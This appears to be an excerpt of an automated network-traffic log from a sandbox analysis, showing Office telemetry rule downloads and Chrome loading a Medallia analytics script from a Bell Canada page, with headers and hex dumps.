                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      124192.168.2.94992413.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:11 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1389
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 2ff17603-001e-0066-6855-2b561e000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131211Z-15b8d89586fnfb49yv03rfgz1c000000019g000000003905
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      125192.168.2.94992213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:11 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1395
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: f3cd1c79-a01e-0032-01bf-2a1949000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131211Z-159b85dff8flzqhfhC1DFWrn0s00000001dg00000000c21z
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      126192.168.2.94992113.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:12 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1358
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: e6a28f74-a01e-00ab-600b-2b9106000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131212Z-15b8d89586f5s5nz3ffrgxn5ac0000000a6g00000000c6ph
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      127192.168.2.94992313.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:12 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1395
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: d866d412-001e-0028-1c9c-27c49f000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131212Z-15b8d89586f8l5961kfst8fpb00000000ndg0000000096nv
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      128192.168.2.94992513.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:12 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1358
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 41496f62-601e-00ab-428f-2a66f4000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131212Z-159b85dff8fj6b6xhC1DFW8qdg00000001bg000000004gc1
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      129192.168.2.949926130.61.120.24433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC649OUTGET /i/14028/693653/di.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: cdn.decibelinsight.net
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC793INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:12 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Content-Length: 211386
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      x-di-debug: node=c111-248-eu-frankfurt-1 df=61095
                                                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=5400
                                                                                                                                                                                                                                                                                                                                      ETag: W/012511421-192E2B47DED
                                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Cache-Control, Pragma, If-None-Match, Accept, X-HTTP-Method-Override, X-DI-jspsf, X-DI-cookieflags, X-DI-sid, X-DI-lid, X-DI-lid-renew, X-DI-sid-renew, X-DI-lid-time, X-DI-int-state
                                                                                                                                                                                                                                                                                                                                      Access-Control-Max-Age: 604800
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000, h2=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC7399INData Raw: 2f 2a 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 4d 65 64 61 6c 6c 69 61 20 49 6e 63 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 65 64 61 6c 6c 69 61 2e 63 6f 6d 2f 0a 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 64 61 5f 3d 77 69 6e 64 6f 77 2e 5f 64 61 5f 7c 7c 5b 5d 3b 5f 64 61 5f 5b 27 6a 73 56 65 72 73 69 6f 6e 27 5d 3d 31 37 32 30 34 37 31 31 31 38 3b 5f 64 61 5f 5b 22 64 61 5f 77 65 62 73 69 74 65 49 64 22 5d 20 3d 20 36 39 33 36 35 33 3b 5f 64 61 5f 5b 22 72 65 74 75 72 6e 56 69 73 69 74 22 5d 20 3d 20 66 61 6c 73 65 3b 5f 64 61 5f 5b 22 61 63 63 6f 75 6e 74 4e 75 6d 62 65 72 22 5d 20 3d 20 31 34 30 32 38 3b 5f 64 61 5f 5b 22 64 61 5f 64 6e 73 52 65 63 6f 72 64 22 5d 20 3d 20 22 63 6f 6c 6c 65 63 74 69 6f 6e 2e 64 65 63 69 62 65
                                                                                                                                                                                                                                                                                                                                      Data Ascii: /** * Copyright 2024 Medallia Inc. * https://www.medallia.com/ */window._da_=window._da_||[];_da_['jsVersion']=1720471118;_da_["da_websiteId"] = 693653;_da_["returnVisit"] = false;_da_["accountNumber"] = 14028;_da_["da_dnsRecord"] = "collection.decibe
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC8192INData Raw: 65 22 29 3b 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 61 63 68 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4c 49 43 45 4e 53 45 2d 32 2e 30 0a 20 2a 2f 0a 2f 2a 2a 0a 20 2a 20 53 69 7a 7a 6c 65 20 43 53 53 20 53 65 6c 65 63 74 6f 72 20 45 6e 67 69 6e 65 20 76 32 2e 32 2e 31 2d 70 72 65 0a 20 2a 20 68 74 74 70 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3b 69 66 28 62 29 66 6f 72 28 64 3d 62 2e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: e"); * http://www.apache.org/licenses/LICENSE-2.0 *//** * Sizzle CSS Selector Engine v2.2.1-pre * http://sizzlejs.com/ * Released under the MIT license * http://jquery.org/license */!function(){"use strict";function a(a,b,c){var d,e;if(b)for(d=b.
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC8192INData Raw: 5b 30 5d 2c 61 5b 30 5d 29 29 2c 63 3d 4f 62 2e 61 62 73 28 62 5b 32 5d 2d 62 5b 30 5d 29 2c 64 3d 4f 62 2e 61 62 73 28 61 5b 32 5d 2d 61 5b 30 5d 29 2c 66 3d 65 2f 28 28 63 2b 64 29 2f 32 29 2a 31 30 30 2c 66 3e 38 30 26 26 4f 62 2e 61 62 73 28 61 5b 31 5d 2d 62 5b 33 5d 29 3c 33 30 3f 28 62 5b 30 5d 3d 4f 62 2e 6d 69 6e 28 62 5b 30 5d 2c 61 5b 30 5d 29 2c 62 5b 31 5d 3d 4f 62 2e 6d 69 6e 28 62 5b 31 5d 2c 61 5b 31 5d 29 2c 62 5b 32 5d 3d 4f 62 2e 6d 61 78 28 62 5b 32 5d 2c 61 5b 32 5d 29 2c 62 5b 33 5d 3d 4f 62 2e 6d 61 78 28 62 5b 33 5d 2c 61 5b 33 5d 29 2c 62 5b 34 5d 2b 3d 61 5b 34 5d 29 3a 67 2e 70 75 73 68 28 61 29 7d 29 29 2c 67 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 4c 62 2e 63 72 65 61 74 65 52 61 6e 67 65 28 29
                                                                                                                                                                                                                                                                                                                                      Data Ascii: [0],a[0])),c=Ob.abs(b[2]-b[0]),d=Ob.abs(a[2]-a[0]),f=e/((c+d)/2)*100,f>80&&Ob.abs(a[1]-b[3])<30?(b[0]=Ob.min(b[0],a[0]),b[1]=Ob.min(b[1],a[1]),b[2]=Ob.max(b[2],a[2]),b[3]=Ob.max(b[3],a[3]),b[4]+=a[4]):g.push(a)})),g}function oa(a,b){var c=Lb.createRange()
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:12 UTC8192INData Raw: 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 78 62 28 61 2c 62 29 7b 62 2e 64 61 5f 73 69 64 26 26 28 61 5b 22 58 2d 44 49 2d 73 69 64 22 5d 3d 62 2e 64 61 5f 73 69 64 29 2c 62 2e 64 61 5f 6c 69 64 26 26 28 61 5b 22 58 2d 44 49 2d 6c 69 64 22 5d 3d 62 2e 64 61 5f 6c 69 64 29 2c 2b 62 2e 64 61 5f 66 72 6f 6d 5f 6e 61 74 69 76 65 26 26 28 49 28 22 5f 64 61 5f 66 72 6f 6d 5f 6e 61 74 69 76 65 22 2c 31 29 2c 2b 62 2e 64 61 5f 69 6e 5f 73 61 6d 70 6c 65 26 26 28 61 5b 22 58 2d 44 49 2d 63 6f 6f 6b 69 65 66 6c 61 67 73 22 5d 3d 22 31 7c 30 7c 31 7c 30 7c 31 7c 30 22 2c 61 5b 22 58 2d 44 49 2d 6a 73 70 73 66 22 5d 3d 31 29 29 7d 66 75 6e 63 74 69 6f 6e 20 79 62 28 61 29 7b 76 61 72 20 62 3d 43 28 22 64 5f 69 6e 74 5f 73 74 61 74
                                                                                                                                                                                                                                                                                                                                      Data Ascii: rn Math.round(a)}function xb(a,b){b.da_sid&&(a["X-DI-sid"]=b.da_sid),b.da_lid&&(a["X-DI-lid"]=b.da_lid),+b.da_from_native&&(I("_da_from_native",1),+b.da_in_sample&&(a["X-DI-cookieflags"]="1|0|1|0|1|0",a["X-DI-jspsf"]=1))}function yb(a){var b=C("d_int_stat
